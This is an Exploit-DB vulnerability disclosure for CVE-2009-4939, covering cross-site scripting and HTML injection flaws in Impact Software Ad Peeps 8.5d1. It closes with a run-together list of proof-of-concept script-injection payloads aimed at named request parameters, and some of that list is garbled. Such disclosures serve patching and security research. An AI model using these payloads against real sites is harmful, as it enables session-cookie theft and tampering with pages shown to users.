Impact Software Ad Peeps Cross-Site Scripting and HTML Injection Vulnerabilities

ID EDB-ID:34389
Type exploitdb
Reporter Matt
Modified 2010-07-27T00:00:00


Impact Software Ad Peeps Cross Site Scripting and HTML Injection Vulnerabilities. CVE-2009-4939 . Webapps exploit for php platform


Impact Software Ad Peeps is prone to multiple cross-site scripting vulnerabilities and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code could run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Ad Peeps 8.5d1 is vulnerable; other versions may also be affected."><script>alert(0)</script>"><script>alert(0)</script>"><script>alert(0)</script> ampaignid="><script>alert(0)</script>" ><script>alert(2)</script>&period="><script>alert(1)</script>"><script>alert(0)</script>"><scri pt>alert(1)</script>&loginpass="><script>alert(2)</script>&uid=100000" ><script>alert(0)</script> errors=&from="><script>alert(1)</script>&message=&subject="><script>alert(2)</script>"><s cript>alert(0)</script>